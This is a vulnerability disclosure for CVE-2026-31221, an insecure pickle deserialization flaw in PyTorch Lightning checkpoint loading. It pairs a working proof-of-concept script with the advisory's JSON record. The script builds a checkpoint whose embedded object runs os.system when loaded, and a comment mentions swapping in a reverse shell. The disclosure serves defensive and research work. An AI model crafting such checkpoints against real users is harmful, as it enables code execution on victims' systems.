CVE-2026-31221

import os import torch # Define a malicious class to execute arbitrary code class MaliciousPayload: def __reduce__(self): # The command to execute (e.g., creating a file or reverse shell) # In a real scenario, this could be a more sophisticated payload return (os.system, ('echo PWNED > /tmp/poc.txt',)) # Create a valid PyTorch Lightning checkpoint structure # containing the malicious object payload = MaliciousPayload() checkpoint_data = { 'state_dict': {'model': payload}, # Injecting payload into state dict 'epoch': 1, 'global_step': 100 } # Save the crafted checkpoint file print("[*] Generating malicious checkpoint file...") torch.save(checkpoint_data, "malicious_checkpoint.ckpt") print("[+] Malicious checkpoint created: malicious_checkpoint.ckpt") # --- VICTIM SIDE (Vulnerable Code) --- # The following code demonstrates the vulnerability: # # import pytorch_lightning as pl # # class DummyModel(pl.LightningModule): # def __init__(self): # super().__init__() # # # Loading the malicious file triggers the exploit # # This calls torch.load internally without weights_only=True # model = DummyModel.load_from_checkpoint("malicious_checkpoint.ckpt") # # Result: The command 'echo PWNED > /tmp/poc.txt' will be executed.

{"cve": {"id": "CVE-2026-31221", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:14.020", "lastModified": "2026-05-14T18:54:35.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PyTorch-Lightning versions 2.6.0 and earlier contain an insecure deserialization vulnerability (CWE-502) in the checkpoint loading mechanism. The LightningModule.load_from_checkpoint() method, which is commonly used to load saved model states, internally calls torch.load() without setting the security-restrictive weights_only=True parameter. This default behavior allows the deserialization of arbitrary Python objects via the Pickle module. A remote attacker can exploit this by providing a maliciously crafted checkpoint file, leading to arbitrary code execution on the victim's system when the file is loaded."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lightningai:pytorch_lightning:*:*:*:*:*:python:*:*", "versionEndIncluding": "2.6.0", "matchCriteriaId": "679C8CD0-8E18-4311-BF0C-776968832B4F"}]}]}], "references": [{"url": "https://github.com/Lightning-AI/pytorch-lightning", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.notion.so/CVE-2026-31221-35d1e1393188815f8db7c4fd08076639", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}